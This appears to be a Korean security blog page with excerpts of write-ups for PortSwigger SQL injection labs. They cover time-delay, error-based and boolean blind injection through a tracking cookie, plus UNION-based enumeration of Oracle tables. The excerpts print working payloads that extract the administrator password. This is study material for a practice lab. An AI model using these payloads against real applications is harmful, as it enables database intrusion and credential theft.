일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- 김영권 아내
- 양적완화
- 금리인하
- 킹덤 고근희
- 김재석
- 이상형 만들기
- 임영규
- 최강욱
- 스콜피온킹
- 이태원 클라쓰 15회 예고
- 제넥신
- 고민정
- 조희연
- 홍혜걸
- 성남 코로나 확진자
- 학교 개학 연기 4월
- 스페인 코로나
- 리리남매
- 성남은혜의강교회
- 픽크루
- 뭉쳐야 찬다
- 유튜버 김재석
- 김영권
- libtins
- 폰폰테스트
- 이지혜
- 은혜의 강 교회
- 해킹
- 미국 금리인하
- 불가피
- Today
- Total
목록분류 전체보기 (256)
Dork's port
이번에는 Time delay 를 이용해서 blind injection을 하는 문제 마찬가지로 Cookie에 취약점이 존재 함 Jyo5LYnEFMw7YpXx' UNION SELECT SLEEP(10)-- 이 되지 않음. Jyo5LYnEFMw7YpXx' UNION SELECT PG_SLEEP(10)-- 도 되지 않음. Jyo5LYnEFMw7YpXx' UNION WAITFOR DELAY '0:0:10'-- 도 되지 않음 Jyo5LYnEFMw7YpXx' UNION dbms_pipe.receive_message(('a'),10)-- 도 되지 않음 음.. 데이터 베이스의 가능한 조건을 모두 해봤는데, 되지 않는거보니 다른 취약점이 있거나 무언가 잘못하고 있는..
이 문제는 웹 페이지에서 특정 문자로 condition을 확인하는 게 아닌 500 error 를 통해 확인하는 문제 ' UNION SELECT password FROM users where username='administrator'-- == True ' UNION SELECT password,'a' FROM users where username='administrator'-- == False 즉, False일땐 페이지가 정상적으로 로드되지 않는다. 따라서, condition에 따라 error를 return 하도록 해야하며, portswigger cheat sheet에서 찾을 수 있다. ' UNION SELECT if(1,'a'..
Cookie를 이용해 blind injection을 하는 문제로, 정상적인 결과가 리턴될 때에는 Welcome back! 이라는 문장이 보이면, 정상적으로 리턴되는 것. cookie의 값을 보면 TrackingId 라는 key로 dNVZJnXZvN35tfKj 와 같이 값이 존재한다. Base64 decoding을 해보면 적절한 text로 변형되는 것 같진 않다 (e.g., tՙ&uټݹ岣). 그래서 그냥 SQL injection 코드를 진행해보기로 했다. ' OR 1=1 -- 를 진행한 결과, 정상적으로 Welcome back! 이 출력되었고, 패스워드의 개수를 알기 위해 아래의 쿼리문을 진행 하였다 (테이블의 정보는 문제에서 제공함). ' union select password from u..
' UNION SELECT NULL,NULL FROM DUAL-- 을 통해 2개의 필드인 것을 확인 ' UNION SELECT table_name,NULL FROM all_tables-- 을 통해 table name을 확인 할 수 있다(ref https://docs.oracle.com/cd/B28359_01/server.111/b28320/statviews_2091.htm). ' UNION SELECT table_name,column_name FROM all_tab_columns-- 를 통해 이전 문제와 동일하게 테이블 이름과 column name을 얻을 수 있는데.. 결과가 너무 많다. 간단하게 얻을 수 있는 방법이 없을까.. 그냥 password로 검색해서(이전 문제에 passw..